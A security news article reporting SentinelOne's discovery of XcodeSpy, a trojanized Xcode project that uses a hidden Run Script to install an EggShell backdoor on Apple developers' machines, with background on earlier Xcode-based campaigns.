Cybersecurity researchers on Thursday revealed a new attack in which threat actors are leveraging Xcode as an attack vector to compromise Apple platform developers with a backdoor, adding to a growing trend that involves attacking. developers and researchers with malicious attacks.
Dubbed “XcodeSpy,” the trojanized Xcode project is a tainted version of a legitimate open source project available on GitHub called TabBarInteraction that developers use to animate iOS tab bars based on user interaction.
“XcodeSpy is a malicious Xcode project that installs a custom variant of the EggShell backdoor on the developer’s macOS computer along with a persistence mechanism,” SentinelOne researchers said.
Xcode is Apple’s Integrated Development Environment (IDE) for macOS, used to develop software for macOS, iOS, iPadOS, watchOS, and tvOS.
Earlier this year, Google’s threat analysis group uncovered a North Korean campaign targeting security researchers and exploit developers, which involved sharing a Visual Studio project designed to load a malicious DLL on Windows systems.
The rigged Xcode project does something similar, only this time the attacks have targeted Apple developers.
In addition to including the original code, XcodeSpy also contains an obfuscated Run Script that runs when the developer build target is launched. The script then contacts an attacker-controlled server to retrieve a custom variant of the EggShell backdoor on the development machine, which comes with capabilities to log information from the victim’s microphone, camera, and keyboard.
“XcodeSpy takes advantage of a built-in feature of the Apple IDE that allows developers to run a custom shell script when launching an instance of their target application,” the researchers said. “While the technique is easy to identify if searched for, new or inexperienced developers who are unfamiliar with the Run Script feature are particularly at risk, as there is no prompt in the console or debugger to run the malicious script “.
SentinelOne said it identified two variants of the EggShell payload, with samples uploaded to VirusTotal from Japan on August 5 and October 13 of last year. Additional clues point to an anonymous US organization said to have been targeted with this campaign between July and October 2020, and other developers in Asia are likely to be targeted as well.
Adversaries have previously resorted to tainted Xcode executables (also known as XCodeGhost) to inject malicious code into iOS applications compiled with the infected Xcode without the knowledge of the developers, and subsequently use the infected applications to collect information from devices an once they are downloaded and installed from the App Store.
Then in August 2020, Trend Micro researchers unearthed a similar threat that spread through modified Xcode projects, which, once built, were configured to install a mac malware called XCSSET to steal credentials, capture screenshots , sensitive data from messaging and note-taking apps. and even encrypt files for a ransom.
But XcodeSpy, on the other hand, takes an easier path, as the goal appears to be to hit the developers themselves, although the ultimate goal behind the exploitation and the identity of the group behind it is still unclear.
“Targeting software developers is the first step in a successful supply chain attack. One way to do this is to abuse the development tools necessary to carry out this work,” the researchers said.
“It is quite possible that XcodeSpy was targeting a particular developer or group of developers, but there are other potential scenarios with such high-value victims. The attackers could simply be tracking interesting targets and gathering data for future campaigns, or they could be trying collect AppleID credentials for use in other campaigns using malware with valid Apple developer code signatures. “